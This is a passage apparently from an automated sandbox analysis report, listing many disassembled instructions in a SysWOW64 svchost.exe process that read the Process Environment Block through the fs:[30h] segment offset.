            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]1_2_03260124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]1_2_032F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]1_2_0322C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]1_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]1_2_03270185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]1_2_033061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]1_2_032601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]1_2_0322A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]1_2_0322C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]1_2_032C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]1_2_032B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]1_2_0325C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]1_2_03232050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]1_2_032B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]1_2_032C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]1_2_0323208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0322A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]1_2_032380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]1_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]1_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]1_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]1_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]1_2_032AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]1_2_0326C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]1_2_03230710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]1_2_03260710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]1_2_03238770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]1_2_03230750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]1_2_032BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]1_2_032B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]1_2_032307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]1_2_032E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]1_2_032D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]1_2_032BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]1_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]1_2_032B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]1_2_0324E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]1_2_03266620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]1_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]1_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]1_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]1_2_03272619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03262674 mov eax, dword ptr fs:[00000030h]1_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h]1_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h]1_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h]1_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h]1_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov eax, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264588 mov eax, dword ptr fs:[00000030h]1_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h]1_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h]1_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h]1_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h]1_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h]1_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
